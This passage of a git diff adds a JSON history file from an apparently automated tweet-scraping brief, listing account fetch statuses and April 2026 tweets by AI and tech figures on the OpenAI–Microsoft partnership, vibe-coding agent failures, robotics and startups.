ones that build the best intellige…\n - https://nitter.net/Ronald_vanLoon/status/2048749087323820198#m\n- @Ronald_vanLoon | 2026-04-27T13:00:20+00:00\n - R to @Ronald_vanLoon: The second misconception I keep seeing: Too many teams think they have to choose between open models and proprietary models. They do not. The smarter path is…\n - https://nitter.net/Ronald_vanLoon/status/2048749084446515253#m\n- @Ronald_vanLoon | 2026-04-27T13:00:19+00:00\n - R to @Ronald_vanLoon: My biggest takeaway: Models are becoming components, not products. What matters now is the system around them: → runtimes → memory → tool access → orchestrat…\n - https://nitter.net/Ronald_vanLoon/status/2048749081464287511#m\n- @Ronald_vanLoon | 2026-04-27T13:00:18+00:00\n - Most enterprise AI strategies are already behind. Not because they picked the wrong model, but because they are still thinking at the model layer. The real shift is happening one …\n - https://nitter.net/Ronald_vanLoon/status/2048749077911736401#m\n- @Ronald_vanLoon | 2026-04-27T12:50:08+00:00\n - Shape-Shifting Wheels by KIMM Let Wheelchairs Climb Stairs and Conquer Any Terrain by @spaceandtech_ #Innovation #EmergingTech #Technology\n - https://nitter.net/Ronald_vanLoon/status/2048746516324487529#m\n- @GaryMarcus | 2026-04-27T12:48:41+00:00\n - R to @GaryMarcus: Stop blaming the users. It’s not that simple:\n - https://nitter.net/GaryMarcus/status/2048746152749846549#m\n- @GaryMarcus | 2026-04-27T12:36:05+00:00\n - People keep blaming the users for the growing number of vibe-coded reasoners. Doing so is *half* right. Users *are*screwing up - by letting vibe coded stuff access their files, wi…\n - https://nitter.net/GaryMarcus/status/2048742983684784239#m\n- @GaryMarcus | 2026-04-27T12:20:17+00:00\n - “Vibe coded disasters piling up on Reddit”\n - https://nitter.net/GaryMarcus/status/2048739005525877072#m\n- @Ronald_vanLoon | 2026-04-27T12:18:17+00:00\n - AI Q: The Emotion-Reading Humanoid #Robot That Reacts Like a Real Being via @XRoboHub #Robots #ArtificialIntelligence #Innovation #Technology #Tech\n - https://nitter.net/Ronald_vanLoon/status/2048738501798121537#m\n- @Ronald_vanLoon | 2026-04-27T11:20:17+00:00\n - Skild Brain Pairs With Jetson Thor to Power Next-Gen #Robotics Intelligence by @CyberRobooo #Robot #Engineering #Innovation #Technology\n - https://nitter.net/Ronald_vanLoon/status/2048723908744954357#m\n- @Ronald_vanLoon | 2026-04-27T10:56:01+00:00\n - You’re about to feel the #AI money squeeze by Hayden Field @verge Learn more: https://bit.ly/3QwH0fu #ArtificialIntelligence #MachineLearning #ML\n - https://nitter.net/Ronald_vanLoon/status/2048717799531397534#m\n- @Ronald_vanLoon | 2026-04-27T10:50:49+00:00\n - Shape-Shifting All-Terrain #Robot Combines Legs, Wheels, and Aerial #Drone Power by @XueJia24682 #Robotics #EmergingTech #Technology #Innovation\n - https://nitter.net/Ronald_vanLoon/status/2048716491537650168#m\n- @Ronald_vanLoon | 2026-04-27T10:18:11+00:00\n - Pizza Goes Underwater: Domino’s UK Trials Submarine Delivery by @IntEngineering #Innovation #EmergingTech #Tech #Technology #TechForGood\n - https://nitter.net/Ronald_vanLoon/status/2048708277739876755#m\n- @paulg | 2026-04-27T10:01:28+00:00\n - One of my favorite pictures. A guy I didn't know took it of us on a street in Palo Alto about 10 years ago.\n - https://nitter.net/paulg/status/2048704073356935676#m\n\n---\n\n*本报告由系统自动生成,供月度复盘使用。*\n", + "paths": { + "tweet_summary_md": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/Claude_input/x资讯/推文汇总_202604.md", + "monthly_analysis_md": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/Claude_input/x资讯/月度深度分析_202604.md" + } +} \ No newline at end of file diff --git a/data/x_brief/history/20260427_134306.json b/data/x_brief/history/20260427_134306.json new file mode 100644 index 0000000..a70852b --- /dev/null +++ b/data/x_brief/history/20260427_134306.json @@ -0,0 +1,2969 @@ +{ + "generated_at": "2026-04-27T13:42:08.196749+00:00", + "period": { + "days": 30, + "start_utc": "2026-03-28T13:41:33.629674+00:00", + "end_utc": "2026-04-27T13:42:08.196749+00:00", + "month_tag": "202604" + }, + "overview": { + "total_accounts": 33, + "active_accounts": 18, + "total_tweets": 302, + "failed_accounts": 4 + }, + "accounts": [ + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "" + }, + { + "handle": "gregbrockman", + "account": "@gregbrockman", + "name": "Greg Brockman", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "" + }, + { + "handle": "andrejkarpathy", + "account": "@andrejkarpathy", + "name": "Andrej Karpathy", + "category": "", + "score": "", + "skip_reason": "", + "status": "error", + "tweets_count": 0, + "error": "URLError: " + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 19, + "error": "" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 18, + "error": "" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 14, + "error": "" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 19, + "error": "" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 19, + "error": "" + }, + { + "handle": "lmsqueegie", + "account": "@lmsqueegie", + "name": "Lars Nielsen", + "category": "", + "score": "", + "skip_reason": "", + "status": "error", + "tweets_count": 0, + "error": "URLError: " + }, + { + "handle": "david__tian", + "account": "@david__tian", + "name": "David Tian", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "" + }, + { + "handle": "Bitking_", + "account": "@Bitking_", + "name": "BTCKing", + "category": "", + "score": "", + "skip_reason": "", + "status": "error", + "tweets_count": 0, + "error": "URLError: " + }, + { + "handle": "CryptoCred", + "account": "@CryptoCred", + "name": "Credible Crypto", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 7, + "error": "" + }, + { + "handle": "AltcoinBuzz", + "account": "@AltcoinBuzz", + "name": "Altcoin Buzz", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "" + }, + { + "handle": "TradingGods", + "account": "@TradingGods", + "name": "Trading Gods", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "" + }, + { + "handle": "Warrior_Trading", + "account": "@Warrior_Trading", + "name": "Warrior Trading", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "" + }, + { + "handle": "ProfTrading", + "account": "@ProfTrading", + "name": "Profitable Trading", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 19, + "error": "" + }, + { + "handle": "直播带逛Tommy", + "account": "@直播带逛Tommy", + "name": "Tommy", + "category": "", + "score": "", + "skip_reason": "invalid_handle_for_nitter", + "status": "skipped", + "tweets_count": 0, + "error": "invalid_handle_for_nitter" + }, + { + "handle": "AndrewYNg", + "account": "@AndrewYNg", + "name": "Andrew Ng", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 5, + "error": "" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 19, + "error": "" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 9, + "error": "" + }, + { + "handle": "MikeAI", + "account": "@MikeAI", + "name": "Michael", + "category": "", + "score": "", + "skip_reason": "", + "status": "error", + "tweets_count": 0, + "error": "URLError: " + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "" + }, + { + "handle": "erikbryn", + "account": "@erikbryn", + "name": "Erik Brynjolfsson", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 14, + "error": "" + }, + { + "handle": "二级炒家", + "account": "@二级炒家", + "name": "二级炒家", + "category": "", + "score": "", + "skip_reason": "invalid_handle_for_nitter", + "status": "skipped", + "tweets_count": 0, + "error": "invalid_handle_for_nitter" + }, + { + "handle": "王川", + "account": "@王川", + "name": "王川", + "category": "", + "score": "", + "skip_reason": "invalid_handle_for_nitter", + "status": "skipped", + "tweets_count": 0, + "error": "invalid_handle_for_nitter" + }, + { + "handle": "老胡", + "account": "@老胡", + "name": "老胡", + "category": "", + "score": "", + "skip_reason": "invalid_handle_for_nitter", + "status": "skipped", + "tweets_count": 0, + "error": "invalid_handle_for_nitter" + }, + { + "handle": "比特币超级玩家", + "account": "@比特币超级玩家", + "name": "超级玩家", + "category": "", + "score": "", + "skip_reason": "invalid_handle_for_nitter", + "status": "skipped", + "tweets_count": 0, + "error": "invalid_handle_for_nitter" + } + ], + "tweets": [ + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "The video of my conversation with Amin Vahdat, @gilbert, and @djrosent at Cloud Next last week is now up. \n\nhttps://youtu.be/BpnJYJmbXcM?si=vUY3hI_aDX8K6gco\n\nThanks for a great conversation!", + "url": "https://nitter.net/JeffDean/status/2048759102390899142#m", + "published_at": "2026-04-27T13:40:08+00:00" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "⚠️ AI agents are wildly premature technology that is being rolled out way too fast. The deepest lesson about the vibe coded AI agent disaster story that is running around is NOT about losing your data. ⚠️\n\n𝗜𝘁’𝘀 𝗮𝗯𝗼𝘂𝘁 𝗔𝗜 𝘀𝗮𝗳𝗲𝘁𝘆. \n\nThe user wasn’t (totally) naive. He thought system prompts and guardrails would save him. They didn’t. \n\nIn this case he lost data. Eventually people will lose lives.", + "url": "https://nitter.net/GaryMarcus/status/2048757233174122827#m", + "published_at": "2026-04-27T13:32:43+00:00" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Two areas I would love to invest that are non-technical: \n\n1. Egg freezing clinics. In 10 years, strongly believe every 21 year old will freeze their eggs and it becomes the norm. \n\nAmazing business. Insane retention numbers. Super high margin. \n\n2. AI re-skilling facilities. Go to Canary Wharf, set up AI training centre. Partner with Goldman, JP Morgan etc etc. Sign enterprise agreement with them to train all new employees. \n\nBoth absolute goldmines!", + "url": "https://nitter.net/HarryStebbings/status/2048756619622707452#m", + "published_at": "2026-04-27T13:30:16+00:00" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "title": "This is kinda interesting.\n\nAnthro probably needs to scale up Account Support via Claude or via humans (traditional account managers). Would be funny if they chose humans.\n\nAlternatively, more and more companies can probably go multi-AI with open harnesses. \n\nSimilar problems to the cloud era enterprise pains. I'm sure these issues would apply to all the other AI providers.\n\nhttps://www.reddit.com/r/ClaudeAI/comments/1sspwz2/psa_anthropic_bans_organizations_without_warning/", + "url": "https://nitter.net/soumithchintala/status/2048756358820827564#m", + "published_at": "2026-04-27T13:29:14+00:00" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "we have updated our partnership with microsoft.\n\nmicrosoft will remain our primary cloud partner, but we are now able to make our products and services available across all clouds.\n\nwill continue to provide them with models and products until 2032, and a revenue share through 2030.", + "url": "https://nitter.net/sama/status/2048755148361707946#m", + "published_at": "2026-04-27T13:24:26+00:00" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "Dual-Arm Tracked Humanoid Begins Real-World Industrial Trials\nvia @IlirAliu_\n \n#Robotics #ArtificialIntelligence #ML #Innovation #Technology", + "url": "https://nitter.net/Ronald_vanLoon/status/2048751798735835629#m", + "published_at": "2026-04-27T13:11:07+00:00" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "this is so good:\n\nhttps://paulgraham.com/kids.html", + "url": "https://nitter.net/sama/status/2048751392031203544#m", + "published_at": "2026-04-27T13:09:30+00:00" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "R to @Ronald_vanLoon: My view is simple:\n\nThe winners in enterprise AI will not be the companies with access to the most models.\n\nThey will be the ones that build the best intelligent systems around them.\n\nIf you want the full breakdown, watch the video and tell me what part of your AI stack you are rethinking first.\n\nWhat do you think becomes the real source of advantage in the next 12 months, the model itself, or the orchestration layer around it?\n\nCheck out the full article: https://www.linkedin.com/pulse/agentic-ai-reshaping-enterprise-strategy-faster-than-you-van-loon-9rfme", + "url": "https://nitter.net/Ronald_vanLoon/status/2048749087323820198#m", + "published_at": "2026-04-27T13:00:20+00:00" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "R to @Ronald_vanLoon: The second misconception I keep seeing:\n\nToo many teams think they have to choose between open models and proprietary models.\n\nThey do not.\n\nThe smarter path is hybrid.\n\n→ proprietary models for scale and broad capability\n→ open models for flexibility and control\n→ orchestration layers to route each task to the best-fit model in real time\n\nThat is how you balance performance, cost, and governance without locking yourself into one lane.", + "url": "https://nitter.net/Ronald_vanLoon/status/2048749084446515253#m", + "published_at": "2026-04-27T13:00:20+00:00" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "R to @Ronald_vanLoon: My biggest takeaway:\n\nModels are becoming components, not products.\n\nWhat matters now is the system around them:\n\n→ runtimes\n→ memory\n→ tool access\n→ orchestration\n→ secure execution environments\n\nThat is what turns a model into an agent, and an agent into something the business can actually deploy across functions.", + "url": "https://nitter.net/Ronald_vanLoon/status/2048749081464287511#m", + "published_at": "2026-04-27T13:00:19+00:00" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "Most enterprise AI strategies are already behind.\n\nNot because they picked the wrong model, but because they are still thinking at the model layer.\n\nThe real shift is happening one level up, where AI becomes a system that can reason, use tools, retain context, and execute work inside secure environments.\n\nThat changes enterprise strategy faster than most leaders realize.\n\nA thread, with insights from my latest video with NVIDIA…\n\n#NVIDIAPartner #NVIDIAGTC", + "url": "https://nitter.net/Ronald_vanLoon/status/2048749077911736401#m", + "published_at": "2026-04-27T13:00:18+00:00" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "Shape-Shifting Wheels by KIMM Let Wheelchairs Climb Stairs and Conquer Any Terrain\nby @spaceandtech_\n\n#Innovation #EmergingTech #Technology", + "url": "https://nitter.net/Ronald_vanLoon/status/2048746516324487529#m", + "published_at": "2026-04-27T12:50:08+00:00" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "R to @GaryMarcus: Stop blaming the users. It’s not that simple:", + "url": "https://nitter.net/GaryMarcus/status/2048746152749846549#m", + "published_at": "2026-04-27T12:48:41+00:00" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "People keep blaming the users for the growing number of vibe-coded reasoners. Doing so is *half* right.\n\nUsers *are*screwing up - by letting vibe coded stuff access their files, without proper backups, without proper monitoring, without adequate sysadmin, etc.\n\nBut that’s *exactly why* we still need software engineers — and why what Dario recently said about software engineers disappearing is so absurd.\n\nSkilled coders can use vibe-coded tools, with careful oversight.\n\nBut amateurs using vibe-coding tools are asking for trouble. \n\nUsing them without a strong prior working knowledge in coding and sysadmin *is* the mistake.", + "url": "https://nitter.net/GaryMarcus/status/2048742983684784239#m", + "published_at": "2026-04-27T12:36:05+00:00" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "“Vibe coded disasters piling up on Reddit”", + "url": "https://nitter.net/GaryMarcus/status/2048739005525877072#m", + "published_at": "2026-04-27T12:20:17+00:00" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "AI Q: The Emotion-Reading Humanoid #Robot That Reacts Like a Real Being\nvia @XRoboHub\n\n#Robots #ArtificialIntelligence #Innovation #Technology #Tech", + "url": "https://nitter.net/Ronald_vanLoon/status/2048738501798121537#m", + "published_at": "2026-04-27T12:18:17+00:00" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "Skild Brain Pairs With Jetson Thor to Power Next-Gen #Robotics Intelligence\nby @CyberRobooo\n \n#Robot #Engineering #Innovation #Technology", + "url": "https://nitter.net/Ronald_vanLoon/status/2048723908744954357#m", + "published_at": "2026-04-27T11:20:17+00:00" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "You’re about to feel the #AI money squeeze\nby Hayden Field @verge\n\nLearn more: https://bit.ly/3QwH0fu\n\n#ArtificialIntelligence #MachineLearning #ML", + "url": "https://nitter.net/Ronald_vanLoon/status/2048717799531397534#m", + "published_at": "2026-04-27T10:56:01+00:00" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "Shape-Shifting All-Terrain #Robot Combines Legs, Wheels, and Aerial #Drone Power\nby @XueJia24682\n\n#Robotics #EmergingTech #Technology #Innovation", + "url": "https://nitter.net/Ronald_vanLoon/status/2048716491537650168#m", + "published_at": "2026-04-27T10:50:49+00:00" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "Pizza Goes Underwater: Domino’s UK Trials Submarine Delivery\nby @IntEngineering\n \n#Innovation #EmergingTech #Tech #Technology #TechForGood", + "url": "https://nitter.net/Ronald_vanLoon/status/2048708277739876755#m", + "published_at": "2026-04-27T10:18:11+00:00" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "One of my favorite pictures. A guy I didn't know took it of us on a street in Palo Alto about 10 years ago.", + "url": "https://nitter.net/paulg/status/2048704073356935676#m", + "published_at": "2026-04-27T10:01:28+00:00" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "You never need to describe something as a \"bad take.\" If it's false or irrelevant or omits something important, you can just say so. And if it's true, relevant, and complete, it's not a bad take.", + "url": "https://nitter.net/paulg/status/2048701354672050286#m", + "published_at": "2026-04-27T09:50:40+00:00" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "Tiny Pacemaker, Big Impact: A Breakthrough in Cardiac Care\nby @pascal_bornet\n\n#HealthTech #Innovation #EmergingTech #TechForGood #Tech #Technology", + "url": "https://nitter.net/Ronald_vanLoon/status/2048699478094315671#m", + "published_at": "2026-04-27T09:43:13+00:00" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "This Smart Trash Can Tracks and Catches Thrown Garbage Automatically\nby @IamKyros69\n \n#EmergingTech #Innovation #TechForGood #Technology", + "url": "https://nitter.net/Ronald_vanLoon/status/2048693406138851388#m", + "published_at": "2026-04-27T09:19:05+00:00" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "Is it time to worry about compute scarcity?\nby @antgrasso\n\n#ArtificialIntelligence #IT #Tech #Technology", + "url": "https://nitter.net/Ronald_vanLoon/status/2048684842036978024#m", + "published_at": "2026-04-27T08:45:03+00:00" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "Real-Life Beetle Bot: Six-Legged Walking #Robot in Action\nvia @ZappyZappy7\n\n#Robotics #MachineLearning #ArtificialIntelligence #ML #MI", + "url": "https://nitter.net/Ronald_vanLoon/status/2048680331864100997#m", + "published_at": "2026-04-27T08:27:08+00:00" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Worrying that your startup will be eaten by the model companies is like worrying that your life will be constrained after you become a movie star. You're far more likely simply to fail.", + "url": "https://nitter.net/paulg/status/2048677984106664227#m", + "published_at": "2026-04-27T08:17:48+00:00" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: Whenever I go to Paris to talk about investing in YC startups, I'm always amazed how much the French just LOVE Y Combinator. Nous t'aimons aussi, France.\n\nMy French friend of @Fundoraclub wanted to see YC from the inside...and share it with the people of France. This is the result: a 90 minute insiders documentary. \n\nI don't work for Y Combinator itself, but I'll give you the experience I've had as a founder, alumni, investor etc. He showed up in March with cameras, videographers, newscasters, youtubers. He brought half the French tech press. \n\nWe spent 4 full days visiting YC founder offices and hacker houses. Going to pre-demo day practice sessions. Late night bar hopping with YC founders. Interviews with YC partners. \n\nIt was real. It was unfiltered. And it was inspiring.\n\nI went to Paris last week with my daughter Callie to watch it in a packed movie theater. This crowd of 500+ French investors got inspired about investing into YC startups. After watching this movie, they understand what I wish everyone understood: YC founders are incredibly capable and resilient builders that want to solve problems and YC helps them become formidable founders. It's impossible to not be inspired by them.\n\nAlan and Bradley Lafond just released the movie on Youtube (link below). Enjoy it! J'espère que vous l'apprécierez!\n\nA big thank you to @dessaigne, @garrytan, Victoria Holst and everyone at YC for helping us. This wasn't an official YC event (our fund and Fundora are not a part of YC to be clear). But they were so welcoming and generous!\n\nIt's an honor to share with France (and now with y'all) the experience I've gotten from YC. Our fund Orange Collective exists to help spread the YC love. If you were thinking of joining us as an investor for Fund I, contact me now before the final close on June 1st. If you're in France, contact Fundora. \n\nAnd big thank you to @nico_laqua, @qhoang09, @gregpr07, @mamagnus00, @smthomas3, @abhiaiyer, @marieschneegans, Veiga Management, Fundora and all the YC founders that hosted us!", + "url": "https://nitter.net/jasonfreedman/status/2048615296613937201#m", + "published_at": "2026-04-27T04:08:42+00:00" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: The greatest con of the decade was calling autocomplete “AI”. \n\nThe second greatest is calling autocomplete-in-a-loop an “agent”.", + "url": "https://nitter.net/atmoio/status/2048608025464705084#m", + "published_at": "2026-04-27T03:39:49+00:00" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Grok Imagine", + "url": "https://nitter.net/elonmusk/status/2048600964102246438#m", + "published_at": "2026-04-27T03:11:45+00:00" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "“Always keep a separate backup.” For sure, every experienced programmer should know this.\n\n𝘉𝘶𝘵 𝘸𝘦 𝘫𝘶𝘴𝘵 𝘤𝘳𝘦𝘢𝘵𝘦𝘥 𝘢 𝘸𝘩𝘰𝘭𝘦 𝘨𝘦𝘯𝘦𝘳𝘢𝘵𝘪𝘰𝘯 𝘰𝘧 𝘷𝘪𝘣𝘦 𝘤𝘰𝘥𝘦𝘳𝘴 𝘸𝘩𝘰 𝘥𝘰𝘯’𝘵.\n\nAnd we now have a legion of synthetic coding agents (like Cursor) that also apparently don’t always follow this basic principle, either.\n\n𝗪𝗵𝗶𝗰𝗵 𝗶𝘀 *𝗲𝘅𝗮𝗰𝘁𝗹𝘆* 𝘄𝗵𝘆 𝘄𝗲 𝘀𝗵𝗼𝘂𝗹𝗱 𝗻𝗼𝘁 𝘁𝗿𝘂𝘀𝘁 𝗰𝗼𝗱𝗶𝗻𝗴 𝗮𝗴𝗲𝗻𝘁𝘀.", + "url": "https://nitter.net/GaryMarcus/status/2048593283639894520#m", + "published_at": "2026-04-27T02:41:14+00:00" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Curiosity & adventure are my philosophy\n\nhttps://grok.com/share/bGVnYWN5_d70e0164-cced-4096-99cb-38604067aa7a", + "url": "https://nitter.net/elonmusk/status/2048589691054694406#m", + "published_at": "2026-04-27T02:26:57+00:00" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: “fails less often than a human does” is a terrible metric. \n \nWe build deterministic software and test it to destruction to ensure it’s 99.99999 reliable . That’s been the basis of every critical application such as accounting payroll and logistics. \n\nLLMs can’t get even close.", + "url": "https://nitter.net/SteveStricklan6/status/2048589239915577837#m", + "published_at": "2026-04-27T02:25:10+00:00" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: the beauty of a jagged frontier\nis that every failure is the user's fault\nand every breakthrough is the model's glory", + "url": "https://nitter.net/suchenzang/status/2048582672163995766#m", + "published_at": "2026-04-27T01:59:04+00:00" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Incredible writing from @euphoriaHBO", + "url": "https://nitter.net/Jason/status/2048580651985604783#m", + "published_at": "2026-04-27T01:51:02+00:00" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: I mean AI influencers here and everywhere are screaming you shouldn't get hired if you don't use agentic AI because you're deliberatly slowing everyone down and the moment something goes wrong it's your fault because you didn't understand the tool?", + "url": "https://nitter.net/BlackHackOfDoom/status/2048580122521780676#m", + "published_at": "2026-04-27T01:48:56+00:00" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: The only AGI that Sam Altman is after is Adjusted Gross Income.", + "url": "https://nitter.net/FrankRundatz/status/2048579079121555764#m", + "published_at": "2026-04-27T01:44:47+00:00" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "the difference is that we don’t *hype* giving 12 year-olds bulldozers.\n\n*of course* it’s a kind of user error when a model destroys all of user’s data and they didn’t have a backup. that’s the point.\n\nvibe coding without considerable experience is like driving without a license.", + "url": "https://nitter.net/GaryMarcus/status/2048578055283880296#m", + "published_at": "2026-04-27T01:40:43+00:00" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: Never ever use generative AI for anything critical. \n\nThe technology is probablistic all the way down and therefore inherently unreliable. \n\nWhy is this so hard to understand? \n\nIt’s wild how many seemingly smart people have drunk the cool aid on this.", + "url": "https://nitter.net/SteveStricklan6/status/2048570082843082905#m", + "published_at": "2026-04-27T01:09:02+00:00" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "Generative AI as the Hindenberg", + "url": "https://nitter.net/GaryMarcus/status/2048567837221089669#m", + "published_at": "2026-04-27T01:00:07+00:00" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "Is it me or X starting to look like a vibe coded mess?\n\nPolls are broken.\n\nAccounts are getting hacked.\n\nMy DMs are full of phishing scams.\n\nBasics that used to work no longer work.", + "url": "https://nitter.net/GaryMarcus/status/2048558998325166498#m", + "published_at": "2026-04-27T00:25:00+00:00" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "so fun to see the reception to 5.5!\n\nthere is almost nothing that feels more gratifying to me than builders saying they find our tools useful.", + "url": "https://nitter.net/sama/status/2048554097985593849#m", + "published_at": "2026-04-27T00:05:31+00:00" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "R to @GaryMarcus: btw polling software is broken! votes aren’t showing, as many folks have noted. eg I see none:", + "url": "https://nitter.net/GaryMarcus/status/2048553390540734479#m", + "published_at": "2026-04-27T00:02:43+00:00" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "Total AI disaster, totally predictable", + "url": "https://nitter.net/GaryMarcus/status/2048552931923013916#m", + "published_at": "2026-04-27T00:00:53+00:00" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "Our Principles:\n\nDemocratization, Empowerment, Universal Prosperity, Resilience, and Adaptability\n\nhttps://openai.com/index/our-principles/", + "url": "https://nitter.net/sama/status/2048552677433643427#m", + "published_at": "2026-04-26T23:59:53+00:00" + }, + { + "handle": "GaryMarcus", + "account": 